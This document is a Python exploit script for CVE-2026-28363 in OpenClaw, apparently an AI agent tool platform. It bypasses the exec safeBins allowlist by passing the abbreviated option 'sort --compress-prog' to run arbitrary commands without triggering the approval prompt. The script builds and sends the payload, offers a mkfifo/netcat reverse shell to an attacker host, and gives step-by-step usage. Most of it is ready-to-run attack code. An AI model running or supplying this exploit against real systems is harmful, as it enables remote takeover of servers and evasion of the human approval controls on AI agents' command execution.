#!/usr/bin/env python3
# Exploit Title: OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution
# CVE: CVE-2026-28363
# Date: 2026-02-27
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/openclaw/openclaw
# Software Link: https://github.com/openclaw/openclaw
# Affected: OpenClaw <= 2026.2.22 (when tools.exec.security=allowlist + sort in safeBins)
# Tested on: OpenClaw 2026.2.22 (Ubuntu 24.04 / Debian-based with default-ish config)
# Category: Remote Command Execution
# Platform: Linux
# Exploit Type: Remote
# CVSS: 9.9 (CRITICAL) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
# CWE: CWE-184 (Incomplete List of Disallowed Inputs)
# Description: OpenClaw before 2026.2.23 fails to properly validate abbreviated GNU long options when checking the tools.exec.safeBins allowlist/denylist for the sort command.
# Using --compress-prog=... instead of --compress-program=... bypasses the security check, allowing low-privileged authenticated users to execute arbitrary commands via dangerous sort flags without triggering the approval workflow.
# Fixed in: OpenClaw >= 2026.2.23 (commit 3b8e33037ae2e12af7beb56fcf0346f1f8cbde6f or later)
# Usage:
# python3 exploit.py <target_url> --token <auth_token> [--lhost <ip>] [--lport <port>] [--cmd "command here"]
#
# Examples:
# # Simple proof-of-concept write file
# python3 exploit.py http://192.168.10.50:8080 --token eyJhbGciOi... --cmd "id > /tmp/pwned.txt"
#
# # Reverse shell
# python3 exploit.py http://target:8080 --token <token> --lhost 192.168.1.77 --lport 4444
#
# Options:
# <target_url> Base URL of vulnerable OpenClaw instance (http(s)://host:port)
# --token Bearer token or API key of a low-privileged user
# --lhost Attacker IP for reverse shell (optional)
# --lport Attacker port for reverse shell (optional)
# --cmd Custom command to execute via sort --compress-prog (optional)
#
# Notes:
# - Requires low-priv authenticated access (any user that can call tools.exec)
# - Endpoint assumed: /api/tools/exec → change ENDPOINT variable if different
# - sort must be present in tools.exec.safeBins (common in default/recommended configs)
# - For authorized penetration testing / red-team / research use only
#
# How to Use
# Step 1: Obtain a valid low-privileged Bearer token / API key
# Step 2: (optional) Start listener: nc -lvnp 4444
# Step 3: Run exploit with target and token (add --lhost/--lport for revshell)
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║
║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║
║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║
║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║
║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║
║ ║
║ b a n y a m e r _ s e c u r i t y ║
║ ║
║ >>> Silent Hunter • Shadow Presence <<< ║
║ ║
║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ CVE-2026-28363 • OpenClaw sort safeBins → Authenticated RCE Bypass ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import requests
import argparse
import sys
parser = argparse.ArgumentParser(description="CVE-2026-28363 OpenClaw sort safeBins RCE Bypass")
parser.add_argument("target", help="Target OpenClaw base URL (e.g. http://192.168.10.50:8080)")
parser.add_argument("--token", required=True, help="Bearer token or API key")
parser.add_argument("--lhost", help="Listener IP for reverse shell")
parser.add_argument("--lport", help="Listener port for reverse shell")
parser.add_argument("--cmd", help="Custom command to run (overrides reverse shell)")
args = parser.parse_args()
BASE_URL = args.target.rstrip("/")
ENDPOINT = "/api/tools/exec" # ← change if your deployment uses different path
HEADERS = {
"Authorization": f"Bearer {args.token}",
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (compatible; OpenClaw-Exploit-PoC)"
}
# Default PoC: write proof file
command = "echo 'EXPLOITED CVE-2026-28363 by @banyamer_security' > /tmp/rce-poc-$(date +%%s).txt"
if args.cmd:
command = args.cmd
elif args.lhost and args.lport:
# Classic mkfifo reverse shell via sort --compress-prog
command = (
f"rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | "
f"/bin/sh -i 2>&1 | nc {args.lhost} {args.lport} >/tmp/f"
)
# Exploit payload using abbreviated long option bypass
payload = {
"tool": "exec",
"args": {
"cmd": "sort",
"args": [
f"--compress-prog=sh -c '{command}'",
"-o", "/dev/null",
"/dev/null"
]
}
}
print("[*] Sending exploit payload...")
print(f" Target : {BASE_URL}{ENDPOINT}")
print(f" Command : {command}")
print(f" Auth : Bearer {args.token[:12]}...")
try:
r = requests.post(
f"{BASE_URL}{ENDPOINT}",
headers=HEADERS,
json=payload,
timeout=12,
allow_redirects=False
)
print(f"[+] Status code : {r.status_code}")
if r.status_code in (200, 201, 202, 204):
print("[!] Likely SUCCESS — command probably executed without approval prompt")
print(" Check /tmp/ on target for files or catch reverse shell")
elif "approval" in r.text.lower() or "forbidden" in r.text.lower():
print("[-] Failed — approval prompt or block still triggered")
elif r.status_code == 401 or r.status_code == 403:
print("[-] Authentication failed — invalid or insufficient token")
else:
print("[-] Unexpected response:")
print(r.text[:400] + "..." if len(r.text) > 400 else r.text)
except requests.exceptions.RequestException as e:
print(f"[!] Request error: {e}")
sys.exit(1)
print("\nExploit finished. Good hunting.")
